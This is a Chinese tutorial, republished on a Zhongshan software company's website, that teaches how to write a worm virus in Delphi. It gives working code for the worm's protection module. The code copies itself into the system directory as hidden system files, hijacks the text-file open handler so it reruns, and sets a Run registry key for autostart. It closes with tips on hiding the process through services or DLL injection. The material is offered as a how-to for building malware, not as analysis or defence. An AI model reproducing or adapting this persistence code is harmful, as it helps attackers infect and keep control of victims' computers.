中山比尔科技 / 中山华盛科技有限公司 中山比尔/中山华盛科技有限公司   中山比尔/中山华盛科技有限公司 设为主页  |  加入收藏  
  中山比尔/中山华盛科技有限公司
 
中山华盛科技有限公司
ERP软件
POS软件
其他硬件
解决方案
Linux/Unix
 
ERP软件
ERP管理系统解决方案(分模块)
服装ERP管理软件解决方案
电子厂ERP管理软件解决方案
灯饰厂ERP管理软件解决方案
鞋业ERP管理软件解决方案
卫浴洁具ERP管理软件解决方案
POS软件
商场百货总部-分店连锁解决方案
商场百货POS管理软件解决方案
超市POS管理软件解决方案
连锁店总部-分店解决方案
连锁店POS管理软件解决方案
服装连锁POS管理软件解决方案
连锁型会员解决方案
POS硬件
商业POS机
商业数据中心服务器
其他硬件
工业型-数据采集器-HT3600
商业型-数据采集器-HT3300
条形码打印机-斑马Zebra888
条形码打印机-斑马Zebra140XI
条形码打印机-斑马Zebra170XI
条形码打印机-TSC 243E
条形码打印机-东芝 TEC B-452
条形码打印机-立象 OS-214
条形码阅读器-Metrologic6130
条形码阅读器-Argox RF800
条形码阅读器-SymbolLs4004P
解决方案
企业网络解决方案
ICEFLOW VPN应用
VPN在DRP连锁分销管理中应用
知识平台
DELPHI编写邮件特快专递程序
DELPHI中数据的自动录入
DELPHI访问数据库结构
DELPHI的"八皇后"问题
API实现在MSN的信息提示
DELPHI编写蠕虫病毒浅析
开源软件-Linux/Unix
三十种Linux发行版名称含义祥解
站在开源社区,建立开放新世界
从Windows转向UNIX的一些困惑
Linux系统更耐网络攻击
开源开发模式是否适合商业用户
开源程序应用仍然有待改善
 
 
 
客户案例
   
  您现在的位置是: 中山华盛科技主页 - 软件开发 / 知识平台 - 用DELPHI编写蠕虫病毒浅析
 
   
 

用DELPHI编写蠕虫病毒浅析

 
http://dev.21tx.com 2006年09月06日 黑客风云
 

前言

   可能大家想到病毒,第一反应就是可能是用asm来编写,或者是 VB sript,而高级语言如 Delphi 就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用 汇编 写出来的程序哦。

   一个病毒程序首先要短小,我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道,如果在uses里面加入forms,classes.....等就会使目标文件非常的大,所以,在我们的程序里,我们要尽可能的不用这些库。我们只用 Windows ,winsock,shellapi,sysutils(这个里面包含了一些常用的函数,比如对文件的操作,对字符串的操作,如果用自己的程序来代替,目标文件会更加的小)

   首先,我们知道,一个病毒程序一般都分下面三个模块:

   ①保护模块;

   ②感染模块;

   ③发作模块。

   下面我们就从这三个模块开始,分别实现他们的代码。

   一)保护模块。

   一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory :

UINT GetSystemDirectory(
LPTSTR l PB uffer, // 存放返回的字符串的缓冲区
UINT uSize // 上面的缓冲去的长度
);

   相关的函数还有GetWindowsDirectory可以得到%windows%的路径

   得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :

BOOL CopyFile(
LPCTSTR lpExistingFileName, // 源文件的路径
LPCTSTR lpNewFileName, // 目标文件的路径
BOOL bFailIfExists // 这是一个标志,如果目标文件已经存在,是否强制覆盖
);

   拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,除非选取查看所有文件,以及显示受保护文件。 同样,介绍一个函数SetFileAttributes :

BOOL SetFileAttributes(
LPCTSTR lpFileName, // 需要设置的文件的文件名
DWORD dwFileAttributes // 设置的值。
);

   我们这里要设置为隐藏和系统,那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM

   下面就是最重要的,让该文件开机自动运行,我们一般都是写 注册表 ,首先用RegOpenKey函数来打开一个键。


LONG RegOpenKey(
HKEY hKey, // 主键,比如HKEY_LOCAL_MACHINE
LPCTSTR lpSubKey, // 跟随的subkey
PHKEY phkResult // 存放函数返回这个打开的键的句柄
);

   得到了HKEY后,就可以用regsetvalueex来向该键写具体的值了。

LONG RegSetvalueEx(
HKEY hKey, // 这个就是刚才我们得到的句柄
LPCTSTR lpvalueName, // 键名的地址
DWORD Reserved, // 一般设置为0
DWORD dwType, // 我们写的键的类型,字符串为REG_SZ
CONST BYTE *lpData, // 键值的地址
DWORD cbData // 写入的键值的长度
);

   下面,我综合上面的说明来给出一个简短的例子:

procedure SelfCopy;
var
Path,value:array [0..255] of char;
Hk:HKEY;
S:string;
begin
GetSystemDirectory(Path,256);
//取得系统的路径
s:=strpas(Path);
//转换成字符串
CopyFile(pchar(paramstr(0)),pchar(S+‘/ruin.exe‘),false);
CopyFile(pchar(paramstr(0)),pchar(S+‘/virus_ruin.exe‘),false);
//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe
SetFileAttributes(pchar(S+‘/ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(pchar(S+‘/virus_ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
//设置刚才的两个文件为系统和隐藏
RegOpenKey(HKEY_CLASSES_ROOT,‘txtfile/shell/open/command‘,Hk);
value:=‘virus_ruin.exe %1‘;
RegSetvalueEx(Hk,‘‘,0,REG_SZ,@value,17);
//把virus_ruin.exe和文本文件关联
RegOpenKey(HKEY_LOCAL_MACHINE,‘Software/Microsoft/Windows/CurrentVersion/Run‘,Hk);
value:=‘ruin.exe‘;
RegSetvalueEx(Hk,‘ruin‘,0,REG_SZ,@value,8);
//设置开机自动运行ruin.exe
end;

   我们看上面的这个程序,就完成了自我复制,和开机自动运行,并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。

   不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,并且进行自我保护。

   如:

begin
if paramcount=1 then
shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal);
//其他的代码

   这里,我只是给出一个简单的例子来描述出一个大概的思路,很多地方还不完善,比如进程的隐藏,你可以进行判断,如果是98你可以re GIS terserverapplication如果你是用的2000,你可以做为服务启动,或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini。

 
 
 
 
 
 
 

 

 
 
网站导航: 首 页|关于我们|新闻中心|ERP软件产品|POS软件产品|硬件产品|客户案例|知识平台|软件下载|解决方案|服务与支持|联系我们|汇款帐号|工作机会|法律条款|网站地图|客户留言
   友情链接:
              汽车租赁      注册香港公司  上海网站建设  上海网站制作 上海网页制作 网站制作      无忧维修网   杭州送水站  POS系统       进销存软件    POS机
              电脑维修网    收银系统      更多友情链接   注册公司
     

Copyright@2006-2009 中山比尔/中山华盛科技有限公司版权所有 网站设计:中山华盛科技  网站优化:中山华盛科技
电话:  0760-8862282 / 0760-8161185 / 0760-8613158 / 0760-8150358 传真: 0760-8862049 / 0760-8615118 / 0760-8862049
地址:  广东省中山市西区西苑广场富荣阁17楼C座(技术部) / 广东省中山市石岐区永胜广场7楼C座(开发部)
        广东省中山市西区西苑电脑城1楼1029(门市) / 广东省中山市西区颐高数码广场1楼F08(门市)
联系人:汪经理 (13590742255) / 黄经理 (13590757383)